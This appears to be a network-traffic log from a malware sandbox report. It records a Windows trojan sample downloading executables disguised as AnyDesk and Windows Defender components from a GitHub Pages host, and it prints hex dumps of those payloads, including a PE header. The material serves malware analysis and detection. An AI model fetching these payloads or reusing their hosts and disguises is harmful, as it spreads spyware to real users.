                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-d600"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:01 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: C0DE:3D4C4C:2868506:2D39471:66F89E98
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-nyc-kteb1890096-NYC
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569561.980613,VS0,VE58
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: bb1ddaba8350fa10e4663133e25dba3bfd8a6200


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    1 | 192.168.2.6 | 49711 | 185.199.110.153 | 443 | 2404 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-09-29 00:26:01 UTC | 73 | OUT | GET /file/AnyDeskCrashHandler.exe HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:01 UTC | 736 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 60416
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-ec00"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:01 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 83DB:34E664:2A39397:2F0A3FE:66F89E99
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569562.795317,VS0,VE30
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 0e9f5c2e20e330cf847b611cef2d61c27bfd4cfc


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    2 | 192.168.2.6 | 49712 | 185.199.110.153 | 443 | 2404 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-09-29 00:26:02 UTC | 89 | OUT | GET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:02 UTC | 737 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 143872
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-23200"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:02 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: E208:AB57C:286E703:2D3F5C1:66F89E9A
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:02 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740076-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569563.676575,VS0,VE17
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 0919a7b70d02b0c26ce00924ed598104205c5488
                                                                                                    Data Ascii: N7eh I^"s <Cp oL$ [h(s0_W|3XQprh? Vf$I;t?%(|Zyf^*9{hX;u"?^3H^!@XoBL+R]SPHCj/ZA ~8IySK(+hY+@1=n0A`)[
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: d0 eb 25 4c ee 8f 60 28 11 fc fa 25 d3 3c a0 f8 82 05 07 23 c7 45 10 0e 9e d7 25 fb 22 57 c0 50 d0 14 06 24 34 d6 8d e7 79 44 54 64 cc 74 04 33 b8 0f b6 7c 88 85 e0 05 bd f8 0c 0d 1f 83 8c 3c 2d 34 20 c0 d8 c0 83 8c 3c 23 28 80 98 80 31 6c 21 22 d2 5d 18 04 da 13 fe 68 50 4d 8e 26 f6 b9 47 0a 41 8f 7c 8e 6d 12 2e 0a 61 29 0a 34 0a 33 0a 26 1d 2a d8 91 0a 2b 0a 02 fe 4b 63 d3 f1 e2 fb f9 96 33 c1 49 ec 21 64 e4 90 91 74 dd 76 ce 46 0e 19 39 78 bf 7a b0 c7 90 91 43 7c a1 53 6d a3 ba b7 33 c0 10 80 33 bf f6 6e c8 06 61 ac ba 1f 9b c9 70 c9 85 62 2f 57 2d 3c c7 19 cc 15 1f e3 86 b7 31 84 7d 3e 3e 6b 2f 3b ff c7 78 72 e8 f6 80 6f 1c 03 17 69 a0 7b 26 a0 56 bc c9 0c 79 b8 1f a2 4d 08 21 b3 04 1b 62 04 46 20 72 ff 16 e3 db 2c 1c 8d 5c 21 dc c6 95 b8 5d fa 07 76
                                                                                                    Data Ascii: %L`(%<#E%"WP$4yDTdt3|<-4 <#(1l!"]hPM&GA|m.a)43&*+Kc3I!dtvF9xzC|Sm33napb/W-<1}>>k/;xroi{&VyM!bF r,\!]v
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 40 95 4a 50 48 40 f2 81 23 84 70 39 d8 0a 80 ab f3 2d 90 0e 28 03 21 40 28 16 ad 92 7c ff 01 a4 bb 62 60 d0 9a 54 24 9a 9d 0d 8b ce ca 2b ba 05 5e fc 39 11 f8 c7 27 18 ac fc 2a c8 70 f9 dc 66 6e 6b 62 63 00 86 f9 8d 5b b1 0f be c0 a1 60 dd 37 0e e3 a9 60 a5 10 6b c5 39 52 ff 24 7c 26 1c 71 c3 8a e1 9f 07 14 72 ee c6 45 85 00 d3 c1 49 2e 39 04 c3 39 36 18 34 2c 07 96 38 d3 60 81 43 1c 27 28 76 85 e8 01 76 e8 d5 fc 07 7c f8 d9 68 f0 6e fd a0 28 79 f8 67 67 69 77 0a 77 6a 79 70 05 38 14 fc 16 8c 70 7d 98 8e 1e f6 c5 04 0d 10 86 f7 55 e1 fc d9 c8 30 28 c0 1e e1 3f 6e 04 53 04 df 55 dd 12 08 5e 1c 0b c4 17 eb 87 76 31 ab 86 99 80 2b 7c d7 cf 3a 5c 09 77 c5 1a 38 e5 11 10 ec c8 5c 23 42 23 d5 32 2b 4c e3 db 45 11 cf 31 9d 8d f0 03 4d 53 79 50 bf 00 05 10 18 20
                                                                                                    Data Ascii: @JPH@#p9-(!@(|b`T$+^9'*pfnkbc[`7`k9R$|&qrEI.9964,8`C'(vv|hn(yggiwwjyp8p}U0(?nSU^v1+|:\w8\#B#2+LE1MSyP
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: c8 24 23 5f 12 4f 8c 4c 32 32 14 3f 16 2f c8 24 23 93 18 1f 1a 0e 39 32 c9 0f 1c ff e4 1e da 86 49 46 ef 20 3f 23 6d 98 b6 61 22 3f 23 24 3f 86 69 1b a6 23 26 3f 23 28 3f 98 b6 61 da 23 2a 3f 23 2c 69 1b a6 6d 3f 23 2e 3f 23 1e 03 3f 9d 30 3e ad 32 08 97 07 84 9f b5 03 67 b6 9c fb d0 0b da 8b 71 b8 c3 85 50 24 30 ff 73 ff 12 54 60 ff 79 7e 0b ff 6e 58 64 ff 5d ff 41 bb 06 6b a7 dd 05 e6 5b 0a 2a 5c 12 52 2a 7e af 9d 6f b8 58 1f 60 12 4f 5e 64 12 4a ff 66 db e7 f9 79 68 68 ff 45 6c 4e ff 2a 41 b9 fe 7b ed be 5a 5b 70 1e 12 2d 32 74 12 72 ff 70 ff bb 70 3c bf f7 fb 31 78 1c 1f ff 2b 30 7c 12 2a ff 24 80 cf f3 f3 fc 22 ff 14 84 3f ff 2f 88 39 76 5e 3b cf ff 3f 8c 4a 21 12 90 0e f1 f3 fc bc 7e 12 94 25 ff 2a 98 27 ff 54 02 17 03 3f 36 58 e3 1e 55 ff 00 21 dd
                                                                                                    Data Ascii: $#_OL22?/$#92IF ?#ma"?#$?i#&?#(?a#*?#,im?#.?#?0>2gqP$0sT`y~nXd]Ak[*\R*~oX`O^dJfyhhElN*A{Z[p-2trpp<1x+0|*$"?/9v^;?J!~%*'T?6XU!
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 0e 48 d3 d8 21 23 87 8c 0c 4a f0 4c e1 72 c8 c8 21 4e d2 50 87 8c 1c 32 c3 52 b4 54 c8 c8 21 23 a5 56 96 8c 1c 32 72 58 87 5a 78 c8 21 23 87 5c 69 5e 1c 32 72 c8 5a 60 4b 62 21 23 87 8c 3c 64 2d a9 74 c8 c8 66 1e 68 17 e4 90 91 63 21 6a 00 6c f9 ea 0c 72 f1 d7 6e cf 70 07 5c f5 ca 6a 8f b0 b0 6c cf 0d b5 bd 96 87 63 57 1c 12 43 57 af 9d 67 6f ce 12 4c 26 12 c8 22 10 12 cc d7 ee 3b 00 46 3b d0 12 22 17 12 cf fb 9e 9f d4 0c 57 13 d8 4f 22 12 dc 0d f7 3d 3f cf 57 1a e0 27 57 06 e4 63 08 12 cf f3 fb 9e e8 36 63 ec 12 07 57 02 f0 17 cf cf e5 7d 4f f4 12 30 f8 11 57 15 fc ec 08 1c 3c 0a 17 22 36 18 87 1c 08 42 c8 02 04 87 8c 0c fb a3 f3 d6 21 06 e4 08 c8 c8 21 23 d5 0a c6 8c 1c 32 72 0c b7 0e a8 c8 21 23 87 10 99 12 1c 32 72 c8 8a 14 7b 16 21 23 87 8c 6c 18 5d
                                                                                                    Data Ascii: H!#JLr!NP2RT!#V2rXZx!#\i^2rZ`Kb!#<d-tfhc!jlrnp\jlcWCWgoL&";F;"WO"=?W'Wc6cW}O0W<"6B!!#2r!#2r{!#l]
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 43 46 0e 9e bc a0 39 64 e4 90 ad a2 9e a4 43 46 0e 19 8f a6 80 64 e4 90 91 a8 71 aa 62 46 0e 19 39 ac 53 ae 44 e7 90 91 43 b0 35 b2 02 4f c0 5f a7 b4 06 45 1a 84 bb 3e 2d aa a7 30 33 6b 8d 06 61 40 76 6d 7f 44 12 41 7a 6f b4 0e 75 46 12 78 eb 08 3d d5 a2 0c 12 34 23 50 12 e3 99 0e d2 69 1a f6 12 7e c2 a3 f0 7a fb 58 63 0e 5c 8d af 37 16 12 5b 60 9f 33 3b d6 1b ef 46 12 6c 97 68 4f 6c 12 ef 7b 6f b4 86 67 46 12 33 3b 74 12 74 0a bf ef 7d c7 78 12 6b 27 7c 12 71 00 6a 6e 29 3c 58 b2 03 46 b2 12 f0 bd a5 d0 c2 7e b2 12 49 3b 8c fb de a3 70 53 c2 90 12 58 c7 94 12 85 6f 29 b4 36 71 b2 8b 4e 3c 4b e1 2d b2 77 b3 3b 0d f4 8c 10 2e 4c 12 77 5f a8 1a 1c 74 07 3f ef ac 17 8f b0 cf 04 08 0e 3f e2 a4 8b 11 70 50 48 d6 88 92 34 c6 47 c2 b8 0f f1 c8 33 05 91 49 66 43
                                                                                                    Data Ascii: CF9dCFdqbF9SDC5O_E>-03ka@vmDAzouFx=4#Pi~zXc\7[`3;FlhOl{ogF3;tt}xk'|qjn)<XF~I;pSXo)6qN<K-w;.Lw_t??pPH4G3IfC
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 10 76 99 92 ca 94 12 69 14 bd 60 53 52 63 16 ef 18 02 ee 82 4d 10 5f 1a 5f 1c 2f df 05 9b 92 78 1e 5f 20 2e 33 d2 da 2d f0 62 29 22 02 6b 07 b9 03 5d 91 23 39 1b 24 33 ef b8 26 29 19 99 92 d7 28 bf 19 99 92 91 2a a7 2c 8f 99 92 91 29 2e 77 30 92 91 29 19 5f 32 47 91 29 19 99 34 2f 36 91 1c 99 92 17 38 ff b7 8c 4c c9 c8 3a e7 3c cf 4c c9 c8 94 3e b7 40 c9 c8 94 8c 9f 42 87 c8 94 8c 4c 44 6f 46 94 8c 4c c9 57 48 3f 8c 4c c9 c8 4a 27 4c 0f 8e e4 c8 94 4e f7 b6 50 64 64 4a 46 df 52 c7 64 4a 46 a6 54 af 56 4a 46 a6 64 97 58 7f 46 a6 64 64 5a 67 5c 4f a6 64 64 4a 5e 37 60 b6 69 4a 46 1f 62 7f 33 74 b4 9b a6 64 7f b5 33 66 b5 4d 53 db 7f 33 68 7f 33 4d 53 db 34 6a 7f 33 6c 7f 53 db 34 b5 33 6e 7f 33 70 db 34 b5 4d 7f 33 72 7f 33 34 b5 4d 53 74 7f 33 76 da 4d 53
                                                                                                    Data Ascii: vi`SRcM__/x_ .3-b)"k]#9$3&)(*,).w0)_2G)4/68L:<L>@BLDoFLWH?LJ'LNPddJFRdJFTVJFdXFddZg\OddJ^7`iJFb3td3fMS3h3MS4j3lS43n3p4M3r34MSt3vMS
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: b2 77 0f 76 c9 97 c9 b2 73 ca df cb b2 83 5d f2 b5 53 1b cc b2 79 cd 6f c9 97 7c ed ce b2 74 1b cf b2 65 d0 b2 6d 76 c9 97 7c d1 b2 33 d2 b2 32 d3 fb 38 d8 b5 0f d4 b2 63 1b d5 8b d6 83 5d fb 20 bf d7 b2 2e 1b d8 fb b5 0f 76 ed d9 b2 78 1b da 37 db b2 20 1b b0 83 5d f2 dc b2 2f dd fb de 53 b8 f6 41 70 df db e0 b2 61 1b e1 81 5c fb 60 2f e2 b2 6b 1b e3 e4 da 07 c5 e4 7f e5 b2 6c 1b e6 07 c1 c1 0e e7 fb e8 4f e9 81 1c ec da b2 66 1b ea 53 eb 20 07 bb f6 ec b2 54 1b ed 53 ee 07 c3 41 70 ef 33 f0 f3 f1 10 5d fb 60 6f f2 b2 41 1b f3 07 b8 f6 c1 71 f4 5f f5 b2 44 1b f6 86 83 e1 a0 0f f7 67 f8 4b 5c f2 b5 0f f9 b2 55 1b fa b2 70 fb c5 41 71 70 0b fc 0f fd 47 83 e8 60 07 fe df ff af 92 af 7d b0 00 37 01 b2 72 1b 02 b2 76 0e 8e 83 e1 03 2f 04 43 05 60 07 d1 c1 8b
                                                                                                    Data Ascii: wvs]Syo|temv|328c] .vx7 ]/SApa\`/klOfS TSAp3]`oAq_DgK\UpAqpG`}7rv/C`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49714 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:09 UTC | 61 | OUT | GET /file/version.txt HTTP/1.1
Host: duy-thanh.github.io
2024-09-29 00:26:09 UTC | 753 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:09 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740046-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569570.538904,VS0,VE12
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 6b776334eaaa2a021264795acfaec39ed588632a
2024-09-29 00:26:09 UTC | 18 | IN | Data Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
Data Ascii: version=20240913


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49715 | 185.199.110.153 | 443 | 2128 | C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-29 00:26:10 UTC | 74 | OUT | GET /file/AnyDeskUpdateService.exe HTTP/1.1
Host: duy-thanh.github.io
2024-09-29 00:26:10 UTC | 758 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 161792
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-27800"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:10 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: AAC3:C0BC3:2A99413:2F6A54C:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:10 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740073-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569570.140885,VS0,VE18
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 68be8d24789bf086768f140fab71435d11973ddc
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 83 5c ce c7 c7 3d a0 94 c7 3d a0 94 c7 3d a0 94 8c 45 a3 95 c2 3d a0 94 8c 45 a5 95 7f 3d a0 94 8c 45 a4 95 d7 3d a0 94 d7 b9 a3 95 cd 3d a0 94 d7 b9 a4 95 d6 3d a0 94 d7 b9 a5 95 96 3d a0 94 8c 45 a1 95 ce 3d a0 94 c7 3d a1 94 43 3d a0 94 8f b8 a9 95 c6 3d a0 94 8f b8 5f 94 c6 3d a0 94 c7 3d 37 94 c6 3d a0 94 8f b8 a2 95 c6 3d a0 94 52 69 63 68 c7 3d a0 94 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$\===E=E=E====E==C==_==7==Rich=
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 98 0e 6d 51 2c 5c bf 6c d6 1a 1e 3a 63 18 b1 02 d9 6a 7a aa f8 50 70 f0 8b f1 33 ed ff ee cb 95 d6 b9 6e 6b 36 e2 04 8e 60 4a c9 01 a1 28 73 13 6d 69 f8 aa 02 21 50 09 12 78 0e 14 e0 5b 30 f8 7f 3b cf 77 06 8b c5 74 07 eb 09 b8 7a 2e 20 2c 7e 78 17 cd 9a 35 da 40 08 66 48 08 da 50 23 10 0c 4e 14 1f 40 53 02 b6 47 3b 7a 3c 02 8b c2 6f f5 36 0f 57 22 53 da 8b 6f 07 48 0b 0c 48 08 0f 11 02 d6 83 98 3e c3 61 4f 09 f9 7c 20 5b 7e 51 52 90 d8 3b dd 86 2d b2 04 2d 48 0f 45 c2 41 3f 46 db 7b df 57 c7 4a d7 f4 12 8a 89 01 c5 ff 8b 17 d6 83 c1 9a 01 84 28 f6 c3 01 74 0d ba 18 c5 ba 0f 83 ef cf 22 67 0c 6b da c7 df 5f 3a 53 5a 48 8a 91 84 81 e9 c7 cd 43 53 3f b9 b1 04 c7 41 10 6b 8b 9d 6d f0 89 41 3d 46 f5 65 8b c1 9d d9 8b 0d 4e 5f 36 8d 4c 55 04 f2 43 c3 b7 57 26
                                                                                                    Data Ascii: mQ,\l:cjzPp3nk6`J(smi!Px[0;wtz. ,~x5@fHP#N@SG;z<o6W"SoHH>aO| [~QR;--HEA?F{WJ(t"gk_:SZHCS?AkmA=FeN_6LUCW&
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 1e ff a7 bc f8 b0 e8 ec 44 ba d2 41 ec d9 c3 80 cf 35 6e bf 68 cb 2e 37 6c 3f c0 6c 5b 96 e6 44 4c 8b 9a 85 c0 74 09 de b8 00 f6 8b 08 ba bf df 78 3b c0 66 70 c4 5e ff 25 75 e6 07 c7 48 0c dd c3 b8 35 c3 3f 15 c6 6b 8e f0 55 57 41 56 a4 b9 b0 7f f7 7f e0 be 1e 45 33 f6 d4 92 0e 9d 4c 39 31 0f 85 11 05 3e 90 62 b9 30 d9 d0 f0 e8 76 b3 0d 41 67 ef 0f 10 59 28 db 75 0d 92 40 a1 f8 ea 59 30 eb ec 1d 98 a8 26 de f3 fe 53 34 36 b7 e7 4c 89 75 bf c6 45 c7 00 0e cf 53 79 ed 4a d7 df 66 44 08 e7 10 ef f7 7c b7 55 da ff 32 07 0f 0e 17 00 9e ff ba 53 5b 64 6f b6 8f f8 52 76 13 5c df 29 b0 7c fd 1b 4d 1f 2e 5e 24 0a 3e 9e 01 bf c8 48 10 66 06 4e a2 37 2e 15 2f c2 65 f0 4d 0f 39 bb 40 9e 03 79 22 ff ff ef e4 39 90 e7 ef df df cf 82 03 79 0e cf bf bf df 70 78 27 1c d0
                                                                                                    Data Ascii: DA5nh.7l?l[DLtx;fp^%uH5?kUWAVE3L91>b0vAgY(u@Y0&S46LuESyJfD|U2S[doRv\)|M.^$>HfN7./eM9@y"9ypx'
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 58 24 79 78 90 06 7d c4 1e 01 78 60 6d 3b df ef 78 bb 6a 1c 41 bb 60 29 c8 1e 57 78 12 cc f3 fc 3c 3f 51 78 24 d0 2e 78 35 d4 3f cf cf f3 30 78 18 d8 16 78 3f dc 34 78 3c ed be ff 3c e0 2c 78 27 78 bf 78 95 e4 1c 12 7e bf f7 f3 6d de be 7e 1f e8 11 78 19 50 ec 12 26 78 3e ee 79 ed 3c f0 b0 3d 12 f4 24 78 e7 e7 b5 d3 12 f8 70 26 12 fc 33 78 39 6b f7 7d cd 00 06 2d dc ba 75 95 04 1c 12 28 30 b8 8a f7 df 08 12 25 78 2a 78 b8 5f 30 66 5a 0c 1e cf 7b c3 05 0a 05 af 8f 50 66 41 33 c3 22 0e b9 52 79 2b df 61 78 2d 9a 33 c1 2a 10 62 19 a9 1c 32 86 12 63 72 87 8c 54 0e 14 64 5e 16 95 43 46 2a 65 4a 18 66 91 ca 21 23 36 1a 67 c8 48 e5 90 22 1c 68 0e 0c 72 a4 72 1e 69 fa 8e 20 48 f7 7c 13 af eb 21 c3 22 4d 6b c8 48 77 c8 d7 24 2b 6c c3 39 64 a4 72 26 6d af 28 a9 1c
                                                                                                    Data Ascii: X$yx}x`m;xjA`)Wx<?Qx$.x5?0xx?4x<<,x'xx~m~xP&x>y<=$xp&3x9k}-u(0%x*x_0fZ{PfA3"Ry+ax-3*b2crTd^CF*eJf!#6gH"hrri H|!"MkHw$+l9dr&m(
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 23 87 ca f8 84 69 dd 20 47 ba cc db 6a df 84 ce 2b 6b 95 d9 21 23 cb d0 83 bc 6c 21 23 dd 21 d2 57 6d a3 ec 90 ca c8 d4 94 6e d6 2b 91 ee 90 ca 80 6f d8 83 70 90 91 ee 90 67 da 2b 71 53 ee 90 ca ec dc 83 44 72 de 57 91 ee 90 91 73 2b e0 2b 74 c2 57 e7 90 17 e2 39 e4 0a 0e 79 b9 3c f9 09 6c 58 0b 20 fc 1c 78 25 8c 13 0e 5e 0e a0 12 7d 0e 76 7d cf f3 f3 28 64 0e 78 2c 6b 27 30 b5 bb c0 ff 12 7c 0e 6f 0e 41 bf 4b 0e 8a 34 1e 12 74 ed 2e db ef 32 38 12 70 0e 7b 32 bc 4f 3c 1e 12 56 b6 1f ba 6c 1e bd 51 40 5e 0e 67 1e b8 41 b9 6c ed 5c 44 12 43 1e b9 43 48 76 be df db 12 49 0e bb 4c 1c 41 bb 49 29 4c 1e bd ef f9 bd 4c bc 50 12 58 0e 68 54 51 5f 12 58 7d ef bb e0 f9 1c 41 be 55 5b 5c 1e 55 a4 ba 44 76 be b7 f3 1d 60 12 5a 0e bf 57 1d 64 12 bf 07 6e f7 50 0e b8
                                                                                                    Data Ascii: #i Gj+k!#l!#!Wmn+opg+qSDrWs++tW9y<lX x%^}v}(dx,k'0|oAK4t.28p{2O<VlQ@^gAl\DCCHvILAI)LLPXhTQ_X}AU[\UDv`ZWdnP
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 18 38 a4 ca 21 23 95 1a 39 90 1c 37 e0 90 91 3a 7c 1e 55 20 a0 01 07 2c 1e 36 d0 ed 34 60 06 c1 18 55 00 08 16 f6 cf f3 73 eb 15 b5 15 9a 12 cd 15 a4 08 ae fc 3c 3f cf 15 93 0c 95 15 98 10 92 15 89 fc dc fa f3 14 8c 15 5c 16 8e 12 52 16 7b fe cf f3 f3 1c 70 16 70 20 60 16 6b 16 41 bb 34 16 f9 de ae 01 53 24 1e 12 3a 16 bf 3a 1d 28 fb b6 df fb 55 16 4b 50 2c 12 65 16 75 50 bd 49 33 30 1e f7 7b 4e dc 49 70 64 12 7c ac 41 be 42 33 79 7e af dd 38 1e 12 7a 32 3c 12 76 16 78 40 7d cf e5 f9 79 16 5f 44 6c 48 6f 7d 78 2e 97 e7 12 4c 69 50 77 54 7e ef b2 3d 45 4e aa bf 4e 58 1e 7e 32 41 bc 53 be df db f9 1f 5c 12 40 16 ba 40 1c 41 ba 44 29 60 df 1f bc 76 12 52 7c 64 09 06 16 bb 4d 31 68 f3 ed b6 76 1c 12 46 7a b8 46 5d b9 47 2b 6c e8 15 8a b6 12 2c 16 5e 16 2b 75
                                                                                                    Data Ascii: 8!#97:|U ,64`Us<?\R{pp `kA4S$::(UKP,euPI30{NIpd|AB3y~8z2<vx@}y_DlHo}x.LiPwT~=ENNX~2AS\@@AD)`vR|dM1hvFzF]G+l,^+u
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: db 0c df 66 46 20 bd 48 39 54 1e 16 95 4a 39 7d 0f 8e e0 4c 6d 50 bd 71 4c 9d 54 e1 1e 7c cd 29 7c 56 43 58 4d 6a 6e a3 dd f7 c0 7c 56 2b 5e 0a 26 05 3e d0 59 d8 b7 b7 6a 59 05 28 04 92 91 69 99 2f 23 64 97 19 99 64 64 66 87 68 77 91 49 46 26 6a 67 6c 99 64 64 92 57 6e 47 70 49 46 26 19 37 72 27 64 64 92 91 74 17 76 07 23 87 1c 99 78 f7 69 7a e7 32 c9 c8 24 7c d7 7e 93 8c 4c 32 c7 80 b7 82 6d c3 b4 0d 3f 23 84 3f 23 36 4c db 30 86 3f 23 88 3f c3 b4 0d d3 23 8a 3f 23 8c 3f 4c db 30 6d 23 8e 3f 23 90 b4 0d d3 36 3f 23 92 3f 23 db 30 6d c3 94 3f 23 96 3f 23 86 63 37 4c 98 3f 68 23 9a 3f 98 b6 61 da 23 9c 3f 23 9e 69 1b a6 6d 3f 23 a0 3f 23 b6 61 da 86 a2 3f 23 a4 3f 23 1b a6 6d 98 a6 3f 23 a8 3f 61 da 86 69 23 aa 3f 23 ac a6 6d 98 b6 3f 23 ae 3f 23 b0 da 86
                                                                                                    Data Ascii: fF H9TJ9}LmPqLT|)|VCXMjn|V+^&>YjY(i/#dddfhwIF&jglddWnGpIF&7r'ddtv#xiz2$|~L2m?#?#6L0?#?#?#?L0m#?#6?#?#0m?#?#c7L?h#?a#?#im?#?#a?#?#m?#?ai#?#m?#?#
